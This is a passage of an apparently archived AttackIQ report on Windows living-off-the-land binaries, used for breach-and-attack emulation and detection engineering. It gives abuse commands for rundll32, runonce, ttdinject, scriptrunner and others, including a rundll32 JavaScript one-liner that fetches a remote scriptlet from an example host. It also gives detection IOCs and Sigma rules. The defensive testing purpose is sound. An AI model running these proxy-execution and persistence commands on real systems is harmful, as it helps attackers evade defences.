'%\\AppData\\Local\\Microsoft\\Teams%' AND process:command_line NOT LIKE\r\n'%\\AppData\\Local\\WebEx\\WebEx64\\Meetings\\atucfobj.dll%')) AND (process:command_line NOT LIKE '%/s\r\nC:\\Windows\\System32\\RpcProxy\\RpcProxy.dll') AND (process:command_line NOT LIKE '%\\Program\r\nFiles\\Box\\Box\\Temp\\\\%' OR process:parent_ref.binary_ref.name != 'C:\\Program Files\\Box\\Box\\FS\\streem.exe')))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → regsvr32.exe\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 40 of 50\n\n(Click for Larger)\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nregsvr32.exe → aiq_binary_file_creation.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_regsvr32_anomalies.yml\r\nBack to Top\r\nReplace.exe\r\nBinary description\r\n“replace.exe” is a command-line utility in Windows that is used to replace one or more files with another file. 
The utility is\r\ncommonly used to automate file replacement tasks or to replace files in batch scripts.\r\nTTPs and tactics\r\nCommand and Control: Ingress Tool Transfer (T1105)\r\nHow do the adversaries use it?\r\nAdversaries may use print.exe to copy a file into the system.\r\nAttackIQ Scenarios\r\nCopy a file using “replace.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nreplace.exe helloworld.exe $env:temp /A\r\nThe scenario will be marked as Not Prevented if the file exists en the temp folder.\r\nExecution\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 41 of 50\n\n(Click for Larger)\r\nScenario IOCs\r\n[((process:command_line LIKE '%/a%' OR process:command_line LIKE '%-a%') AND process:binary_ref.name LIKE\r\n'%\\replace.exe')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nreplace.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml\r\nBack to Top\r\nRunonce.exe\r\nBinary description\r\nRunOnce.exe is a legitimate Windows executable file that is used to run programs or commands during the boot process of a\r\nWindows system. 
Specifically, it is part of the Windows RunOnce registry key, which is designed to execute a set of\r\ncommands or applications once, usually during the next system boot.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution (T1218)\r\nHow do the adversaries use it?\r\nAn adversary could use the RunOnce registry key to execute a program or command in an attempt to evade defenses.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “runonce.exe” Script\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 42 of 50\n\nDescription\r\nhis scenario will create a new registry key in the HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components key.\r\nThe key will contain the following subkeys:\r\n‘@’: “attackiq_created”\r\n‘StubPath’: “$pwd\\AIQ_file_creator.exe”\r\nWhere $pwd will point to the scenario’s current working directory.\r\nIf the scenario is able to create the keys, it will then execute the following command:\r\nrunonce.exe /AlternateShellStartup\r\nThe binary AIQ_file_creator.exe will create a file in the temp directory.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented. 
The scenario will be marked as prevented if\r\nthe file does not exist.\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\runonce.exe') AND (process:command_line LIKE '%/AlternateShellStartup%' OR\r\nprocess:command_line LIKE '%/r'))]\r\n[((((windows-registry-key:values[].data NOT LIKE '\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\\\%' AND\r\nwindows-registry-key:values[].data NOT LIKE '\"C:\\Program Files\\Microsoft\\Edge\\Application\\\\%') OR windows-registry-key:values[].data NOT LIKE '%\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --\r\nsystem-level --msedge --channel=stable') AND (windows-registry-key:values[].data NOT LIKE '\"C:\\Program\r\nFiles\\Google\\Chrome\\Application\\\\%' OR windows-registry-key:values[*].data NOT LIKE '%\\Installer\\chrmstp.exe\" -\r\n-configure-user-settings --verbose-logging --system-level%')) AND (windows-registry-key:key LIKE '%\\StubPath'\r\nAND windows-registry-key:key LIKE 'HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nrunonce.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml\r\n/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml\r\nBack to Top\r\nRundll32.exe\r\nBinary description\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 43 of 50\n\nrundll32.exe is a system process in Microsoft Windows operating systems that is responsible for executing 32-bit dynamic\r\nlink library (DLL) files.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution: Rundll32 (T1218.011)\r\nHow do the adversaries use it?\r\nAdversaries may abuse rundll32.exe to proxy execution of malicious code.\r\nRundll32 can also be used to execute scripts such as JavaScript. 
This can be done using a syntax similar to\r\nthis:  rundll32.exe\r\njavascript:\"..\\mshtml,RunHTMLApplication\";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\r\nbehavior has been seen used by malware such as Poweliks.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “rundll32.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nrundll32.exe javascript:\"\\..\\mshtml.dll,RunHTMLApplication\r\n\";eval(\"w=new%20ActiveXObject(\\\"WScript.Shell\\\");w.run(\\\"aiq_binary_file_creation.exe\\\");window.close()\");\r\nThe binary aiq_binary_file_creation.exe will create a file in the C:\\Users\\Public directory.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented. If the file does not exist, the scenario will\r\nbe marked as prevented.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[(process:command_line LIKE '%RunHTMLApplication%' AND process:command_line LIKE '%\\..\\\\%' AND\r\nprocess:command_line LIKE '%mshtml%')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\ncmd.exe → rundll32.exe → aiq_file_creator.exe\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 44 of 50\n\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml\r\nBack to Top\r\nScriptrunner.exe\r\nBinary description\r\nScriptrunner.exe is a legitimate executable that is part of the Microsoft Windows operating system. 
It is used for executing\r\nscripts written in VBScript or JScript languages.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution (T1218)\r\nHow do the adversaries use it?\r\nAdversaries could use scriptrunner to proxy execute malicious binaries using the -appvscript parameter.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “scriptrunner.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nScriptRunner.exe -appvscript AIQ_file_creator.exe\r\nThe binary AIQ_file_creator.exe will create a file in the TEMP directory.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented. If the file does not exist, the scenario will\r\nbe marked as prevented.\r\nExecution\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 45 of 50\n\n(Click for Larger)\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\ScriptRunner.exe') AND process:command_line LIKE '% -appvscript %')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nscriptrunner.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml\r\nBack to Top\r\nTtdinject.exe\r\nBinary description\r\nTtdinject.ext is a legitimate Windows executable file that is used by ttracer.exe to Windbg Time Travel Debugging.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution (T1218)\r\nHow do the adversaries use it?\r\nAdversaries may use it to proxy execute a malicious file.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “ttdinject.exe” Script\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 46 of 50\n\nDescription\r\nThis scenario will execute the following command:\r\nTTDInject.exe /ClientParams \"17 aiq_ttdinject.run 0 0 0 0 0 0 0 0 0 0\" /Launch \"AIQ_file_creator.exe\"\r\nThe binary AIQ_file_creator.exe will create a file in the 
temp directory.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented. If the file does not exist, the scenario will\r\nbe marked as prevented.\r\nThis scenario requires admin privileges.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[(process:binary_ref.name LIKE '%ttdinject.exe')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nttdinject.exe → aiq_file_creator.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml\r\nBack to Top\r\nTttracer.exe\r\nBinary description\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 47 of 50\n\nTtdinject.ext is a legitimate Windows executable file that is used to Windbg Time Travel Debugging.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution (T1218)\r\nHow do the adversaries use it?\r\nAdversaries may use it to proxy execute a malicious file.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “tttracer.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\ntttracer.exe \"AIQ_file_creator.exe\"\r\nThe binary AIQ_file_creator.exe will create a file in the temp directory.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented. 
If the file does not exist, the scenario will\r\nbe marked as prevented.\r\nThis scenario requires admin privileges.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[process:parent_ref.binary_ref.name LIKE '%\\tttracer.exe']\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\ntttracer.exe → aiq_file_creator.exe\r\nin addition, ttdinject.exe is also being called:\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\ntttracer.exe → ttdinject.exe\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 48 of 50\n\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml\r\nBack to Top\r\nVbc.exe\r\nBinary description\r\nVBC.exe is a file that is associated with the Visual Basic .NET compiler, which is part of the Microsoft .NET Framework.\r\nVBC stands for “Visual Basic Compiler.”\r\nTTPs and tactics\r\nDefense Evasion: Obfuscated Files or Information: Compile After Delivery (T1027.004)\r\nHow do the adversaries use it?\r\nAn attacker can deliver a source code file containing the malicious code to the target system and then use vbc.exe to compile\r\nthe code into an executable file. By compiling the code on the target system, the attacker can avoid detection by security\r\nsoftware that may have signatures or behavioral patterns for known malicious executables.\r\nThe use of vbc.exe in this context requires that the attacker has already gained access to the target system and has the\r\nnecessary permissions to execute the compiler. 
Once the code is compiled, the attacker can execute it to achieve their\r\nmalicious goals, such as stealing sensitive data or taking control of the compromised system.\r\nAttackIQ Scenarios\r\nCompile After Delivery using “vbc.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nvbc.exe /target:exe aiq_vb_code.vb\r\nThe content of the aiq_vb_code.vb is:\r\nImports System.IO\r\nModule Program\r\nSub Main()\r\nConsole.WriteLine(\"AttackIQ compiled visual basic program has been spawned.\")\r\nEnd Sub\r\nEnd Module\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 49 of 50\n\nAfter compiling the binary, the scenario will execute the compiled file and search for the message in the stdout.\r\nThe scenario will be marked as Not Prevented if the message “AttackIQ compiled visual basic program has been spawned”\r\nis present in the stdout of the compiled binary execution.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[(process:binary_ref.name LIKE '%\\cvtres.exe' AND process:parent_ref.binary_ref.name LIKE '%\\vbc.exe')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nvbc.exe → cvtres.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml\r\nBack to Top\r\nSource: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 50 of 50",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/"
	],
	"report_names": [
		"hiding-in-plain-sight"
	],
	"threat_actors": [],
	"ts_created_at": 1775434018,
	"ts_updated_at": 1775826754,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ddb9d132d9af5d74f0fb6b8cd6c3f8f829fdca55.pdf",
		"text": "https://archive.orkl.eu/ddb9d132d9af5d74f0fb6b8cd6c3f8f829fdca55.txt",
		"img": "https://archive.orkl.eu/ddb9d132d9af5d74f0fb6b8cd6c3f8f829fdca55.jpg"
	}
}